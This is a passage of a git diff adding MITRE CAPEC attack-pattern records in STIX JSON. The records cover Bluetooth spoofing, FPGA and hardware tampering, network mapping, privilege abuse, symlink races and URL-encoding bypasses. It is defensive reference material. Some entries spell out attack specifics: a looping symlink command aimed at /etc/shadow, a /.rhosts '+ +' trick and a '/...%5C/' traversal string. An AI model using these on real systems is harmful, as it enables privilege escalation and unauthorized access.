+ "Social Engineering" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find disguise and target: The adversary starts the Bluetooth service on the attacking device and searches for nearby listening devices.

  2. Techniques
    Knowledge of a trusted MAC address.
    Scanning for devices other than the target that may be trusted.

Experiment

  1. Disguise: Using the MAC address of the device the adversary wants to impersonate, they may use a tool such as spooftooth or macchanger to spoof their Bluetooth address and attempt to authenticate with the target.

Exploit

  1. Use device capabilities to accomplish goal: Finally, if authenticated successfully the adversary can perform tasks/information gathering dependent on the target's capabilities and connections.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Knowledge of a target device's list of trusted connections." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be in close proximity to Bluetooth devices." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e.json new file mode 100644 index 0000000000000000000000000000000000000000..78bfc74d4b1854d4c92b1e8187b0de4f9ce52309 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e.json 
@@ -0,0 +1,75 @@ +{ + "id": "bundle--65971573-bffa-4e53-80be-678438cdaea1", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary alters the functionality of a field-programmable gate array (FPGA) by causing an FPGA configuration memory chip reload in order to introduce a malicious function that could result in the FPGA performing or enabling malicious functions on a host system. Prior to the memory chip reload, the adversary alters the program for the FPGA by adding a function to impact system operation.\n ", + "external_references": [ + { + "external_id": "CAPEC-674", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/674.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": "John F. 
Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Jeremy Muldavin, Assuring Microelectronics Innovation for National Security & Economic Competitiveness (MINSEC), 2017--11, Office of the Deputy Assistant Secretary of Defense for Systems Engineering", + "external_id": "REF-662", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Design for FPGA Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An adversary with access and the ability to alter the configuration/programming of FPGAs in organizational systems, introduces a trojan backdoor that can be used to alter the behavior of the original system resulting in, for example, compromise of confidentiality of data being processed.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to FPGA programming/configuration-related systems in a chip maker’s development environment where FPGAs can be initially configured prior to delivery to a customer or have access to such systems in a customer facility where end-user FPGA configuration/reconfiguration can be performed." 
+ ], + "x_capec_skills_required": { + "High": "An adversary would need to be skilled in FPGA programming in order to create/manipulate configurations in such a way that when loaded into an FPGA, the end user would be able to observe through testing all user-defined required functions but would be unaware of any additional functions the adversary may have introduced." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482.json new file mode 100644 index 0000000000000000000000000000000000000000..cdf905d293c00dd92db1773d30a12f4b6b820254 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482.json 
@@ -0,0 +1,96 @@ +{ + "id": "bundle--aca56fda-b0b1-4fb3-b3d1-e167b074bf6e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in scanning activities to map network nodes, hosts, devices, and routes. Adversaries usually perform this type of network reconnaissance during the early stages of attack against an external network. Many types of scanning utilities are typically employed, including ICMP tools, network mappers, port scanners, and route testing utilities such as traceroute.", + "external_references": [ + { + "external_id": "CAPEC-309", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "System Network Configuration Discovery", + "external_id": "T1016", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1016" + }, + { + "description": "System Network Connections Discovery", + "external_id": "T1049", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1049" + }, + { + "description": "Gather Victim Network Information", + "external_id": "T1590", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1590" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": 
"http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "external_id": "REF-130", + "source_name": "reference_from_CAPEC", + "url": "http://phrack.org/issues/51/11.html" + } + ], + "id": "attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Network Topology Mapping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642" + ], + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--e6c6d5fb-33e8-43ec-bff5-c0ade9d51304", + "attack-pattern--88933ba2-fe2a-4b71-ac08-2537c5903b2e", + "attack-pattern--93f8b21a-7680-4813-8b4b-2976f5765320", + "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_resources_required": [ + "Probing requires the ability to interactively send and receive data from a target, whereas passive listening requires a sufficient understanding of the protocol to analyze a preexisting channel of communication." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871.json new file mode 100644 index 0000000000000000000000000000000000000000..af961110a7f89354a52ea8420676bf72dbbcd610 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871.json 
@@ -0,0 +1,96 @@ +{ + "id": "bundle--67087e15-2fc6-4a01-bf4d-e97cdfc93018", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources.", + "external_references": [ + { + "external_id": "CAPEC-122", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/122.html" + }, + { + "external_id": "CWE-269", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/269.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-1317", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1317.html" + }, + { + "description": "Abuse Elevation Control Mechanism", + "external_id": "T1548", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1548" + } + ], + "id": "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Privilege Abuse", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_precede_refs": [ + "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" 
+ ], + "x_capec_example_instances": [ + "\n Improperly configured account privileges allowed unauthorized users on a hospital's network to access the medical records for over 3,000 patients. Thus compromising data integrity and confidentiality in addition to HIPAA violations.\n " + ], + "x_capec_extended_description": "\n If access control mechanisms are absent or misconfigured, a user may be able to access resources that are intended only for higher level users. An adversary may be able to exploit this to utilize a less trusted account to gain information and perform activities reserved for more trusted accounts.\n This attack differs from privilege escalation and other privilege stealing attacks in that the adversary never actually escalates their privileges but instead is able to use a lesser degree of privilege to access resources that should be (but are not) reserved for higher privilege accounts. Likewise, the adversary does not exploit trust or subvert systems - all control functionality is working as configured but the configuration does not adequately protect sensitive resources at an appropriate level.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac", + "attack-pattern--d9717514-c621-49cd-b8e1-fd7cc1daa8d1", + "attack-pattern--c195a0a3-62fc-4def-9702-8938440cc9a7" + ], + "x_capec_prerequisites": [ + "The target must have misconfigured their access control mechanisms such that sensitive information, which should only be accessible to more trusted users, remains accessible to less trusted users.", + "The adversary must have access to the target, albeit with an account that is less privileged than would be appropriate for the targeted resources." 
+ ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The ability to access the target is required." + ], + "x_capec_skills_required": { + "Low": "Adversary can leverage privileged features they already have access to without additional effort or skill. Adversary is only required to have access to an account with improper priveleges." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e.json new file mode 100644 index 0000000000000000000000000000000000000000..978f41af81a426194e442ef8841b180dc1ae81f6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e.json 
@@ -0,0 +1,58 @@ +{ + "id": "bundle--a7b5f419-8ef3-4687-a7be-15a8f95ac324", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker substitutes out a tested and approved hardware component for a maliciously-altered hardware component. This type of attack is carried out directly on the system, enabling the attacker to then cause disruption or additional compromise.", + "external_references": [ + { + "external_id": "CAPEC-531", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/531.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + } + ], + "id": "attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Hardware Component Substitution", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "An attacker has access to an organization's warehouse of card readers being included as a part of an overall security system. By replacing a critical hardware component in the card reader, the attacker is able to alter the function of the card reader to allow an attacker-supplied card to bypass a security checkpoint. The card reader is placed in the warehouse, and later used in the victim's security system. The attacker is then able to go to the victim and use their own card and bypass a physical security checkpoint and gain access to the victim's location for further malicious activity." 
+ ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--b217a941-e854-468d-921b-beeba3c73a98", + "attack-pattern--cd81f98a-aa72-4331-a7dd-5f9cd92332e2" + ], + "x_capec_prerequisites": [ + "Physical access to the system or the integration facility where hardware components are kept." + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious system components that perform the same functions and processes as their non-malicious counterparts." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fdeff5dd-62e2-43b2-8eea-5e97307cf973.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fdeff5dd-62e2-43b2-8eea-5e97307cf973.json new file mode 100644 index 0000000000000000000000000000000000000000..514f6b50834bec483e8c2c9bf5a4725028fda805 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fdeff5dd-62e2-43b2-8eea-5e97307cf973.json 
@@ -0,0 +1,106 @@ +{ + "id": "bundle--455a72e4-499c-4f10-9cfa-054e87cf6f79", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack leverages the use of symbolic links (Symlinks) in order to write to sensitive files. An attacker can create a Symlink link to a target file not otherwise accessible to them. When the privileged program tries to create a temporary file with the same name as the Symlink link, it will actually write to the target file pointed to by the attackers' Symlink link. If the attacker can insert malicious content in the temporary file they will be writing to the sensitive file by using the Symlink. The race occurs because the system checks if the temporary file exists, then creates the file. The attacker would typically create the Symlink during the interval between the check and the creation of the temporary file.", + "external_references": [ + { + "external_id": "CAPEC-27", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/27.html" + }, + { + "external_id": "CWE-367", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/367.html" + }, + { + "external_id": "CWE-61", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/61.html" + }, + { + "external_id": "CWE-662", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/662.html" + }, + { + "external_id": "CWE-689", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/689.html" + }, + { + "external_id": "CWE-667", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/667.html" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-115", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Symlink_race" + }, + { + "description": "mkstemp (IEEE Std 1003.1, 2004 Edition), The Open Group Base Specifications Issue 6", + 
"external_id": "REF-116", + "source_name": "reference_from_CAPEC", + "url": "http://www.opengroup.org/onlinepubs/009695399/functions/mkstemp.html" + } + ], + "id": "attack-pattern--fdeff5dd-62e2-43b2-8eea-5e97307cf973", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Leveraging Race Conditions via Symbolic Links", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3da1844e-c905-420a-9179-260356a85a05" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In this naive example, the Unix program foo is setuid. Its function is to retrieve information for the accounts specified by the user. For \"efficiency,\" it sorts the requested accounts into a temporary file (/tmp/foo naturally) before making the queries.\n The directory /tmp is world-writable. The malicious user creates a symbolic link to the file /.rhosts named /tmp/foo. Then, they invokes foo with \"user\" as the requested account. The program creates the (temporary) file /tmp/foo (really creating /.rhosts) and puts the requested account (e.g. \"user password\")) in it. It removes the temporary file (merely removing the symbolic link).\n Now the /.rhosts contains + +, which is the incantation necessary to allow anyone to use rlogin to log into the computer as the superuser.\n [REF-115]\n ", + "GNU \"ed\" utility (before 0.3) allows local users to overwrite arbitrary files via a symlink attack on temporary files, possibly in the open_sbuf function. 
See also: CVE-2006-6939", + "OpenmosixCollector and OpenMosixView in OpenMosixView 1.5 allow local users to overwrite or delete arbitrary files via a symlink attack on (1) temporary files in the openmosixcollector directory or (2) nodes.tmp. See also: CVE-2005-0894", + "Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails. See also: CVE-2000-0972" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Verify that target host's platform supports symbolic links.: This attack pattern is only applicable on platforms that support symbolic links.

  2. Techniques
    Research target platform to determine whether it supports symbolic links.
    Create a symbolic link and ensure that it works as expected on the given platform.
  3. Examine application's file I/O behavior: Analyze the application's file I/O behavior to determine where it stores files, as well as the operations it performs to read/write files.

  4. Techniques
    Use kernel tracing utility such as ktrace to monitor application behavior.
    Use debugging utility such as File Monitor to monitor the application's filesystem I/O calls
    Watch temporary directories to see when temporary files are created, modified and deleted.
    Analyze source code for open-source systems like Linux, Apache, etc.

Experiment

  1. Verify ability to write to filesystem: The attacker verifies ability to write to the target host's file system.

  2. Techniques
    Create a file that does not exist in the target directory (e.g. \"touch temp.txt\" in UNIX-like systems)
    On platforms that differentiate between file creation and file modification, if the target file that the application writes to already exists, attempt to modify it.
    Verify permissions on target directory

Exploit

  1. Replace file with a symlink to a sensitive system file.: Between the time that the application checks to see if a file exists (or if the user has access to it) and the time the application actually opens the file, the attacker replaces the file with a symlink to a sensitive system file.

  2. Techniques
    Create an infinite loop containing commands such as \"rm -f tempfile.dat; ln -s /etc/shadow tempfile.dat\". Wait for an instance where the following steps occur in the given order: (1) Application ensures that tempfile.dat exists and that the user has access to it, (2) \"rm -f tempfile.dat; ln -s /etc/shadow tempfile.dat\", and (3) Application opens tempfile.dat for writing, and inadvertently opens /etc/shadow for writing instead.
    Use other techniques with debugging tools to replace the file between the time the application checks the file and the time the application opens it.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The attacker is able to create Symlink links on the target host.", + "Tainted data from the attacker is used and copied to temporary files.", + "The target host does insecure temporary file creation." + ], + "x_capec_skills_required": { + "Medium": "This attack is sophisticated because the attacker has to overcome a few challenges such as creating symlinks on the target host during a precise timing, inserting malicious data in the temporary file and have knowledge about the temporary files created (file name and function which creates them)." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176.json new file mode 100644 index 0000000000000000000000000000000000000000..69e4973e81fd39c395f62fbb32f5b0fea1387c0e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176.json 
@@ -0,0 +1,50 @@ +{ + "id": "bundle--8b43d226-dc27-481b-b582-515eb54c2a05", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in access control to gain access to currently installed hardware and precedes to implement changes or secretly replace a hardware component which undermines the system's integrity for the purpose of carrying out an attack.", + "external_references": [ + { + "external_id": "CAPEC-401", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/401.html" + }, + { + "external_id": "CWE-1263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1263.html" + } + ], + "id": "attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Physically Hacking Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--7fd3928c-accb-4a35-ba64-000339399ede" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "A malicious subcontractor or subcontractor's employee that is responsible for system maintenance secretly replaces a hard drive with one containing malicious code that will allow for backdoor access once deployed." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732.json new file mode 100644 index 0000000000000000000000000000000000000000..c82fdb2bdd20d1c85d1ae62027ed2b896d19af67 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732.json 
@@ -0,0 +1,155 @@ +{ + "id": "bundle--3f0db678-d127-46f2-a735-b410a59d4f38", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple ways of encoding a URL and abuse the interpretation of the URL. A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. 
It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.", + "external_references": [ + { + "external_id": "CAPEC-64", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/64.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Gunter Ollmann, URL Encoded Attacks - Attacks using the common web browser, CGISecurity.com", + "external_id": "REF-495", + "source_name": "reference_from_CAPEC", + "url": "http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html" + }, + { + "description": "T. Berners-Lee, R. Fielding, L. 
Masinter, RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax, 2005--01", + "external_id": "REF-496", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc3986.txt" + }, + { + "description": "T. Berners-Lee, L. Masinter, M. McCahill, RFC 1738 - Uniform Resource Locators (URL), 1994--12", + "external_id": "REF-497", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc1738.txt" + }, + { + "description": "HTML URL Encoding Reference, W3Schools.com, Refsnes Data", + "external_id": "REF-498", + "source_name": "reference_from_CAPEC", + "url": "http://www.w3schools.com/tags/ref_urlencode.asp" + }, + { + "description": "The URLEncode and URLDecode Page, Albion Research Ltd", + "external_id": "REF-499", + "source_name": "reference_from_CAPEC", + "url": "http://www.albionresearch.com/misc/urlencode.php" + }, + { + "description": "David Wheeler, Secure Programming for Linux and Unix HOWTO", + "external_id": "REF-500", + "source_name": "reference_from_CAPEC", + "url": "http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/filter-html.html#VALIDATING-URIS" + } + ], + "id": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Slashes and URL Encoding Combined to Bypass Validation Logic", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Execute 
Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Attack Example: Combined Encodings CesarFTP\n Alexandre Cesari released a freeware FTP server for Windows that fails to provide proper filtering against multiple encoding. The FTP server, CesarFTP, included a Web server component that could be attacked with a combination of the triple-dot and URL encoding attacks.\n An attacker could provide a URL that included a string like\n /...%5C/\n This is an interesting exploit because it involves an aggregation of several tricks: the escape character, URL encoding, and the triple dot.See also: CVE-2001-1335" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The attacker accesses the server using a specific URL.

Experiment

  1. The attacker tries to encode some special characters in the URL. The attacker find out that some characters are not filtered properly.

Exploit

  1. The attacker crafts a malicious URL string request and sends it to the server.

  2. The server decodes and interprets the URL string. Unfortunately since the input filtering is not done properly, the special characters have harmful consequences.

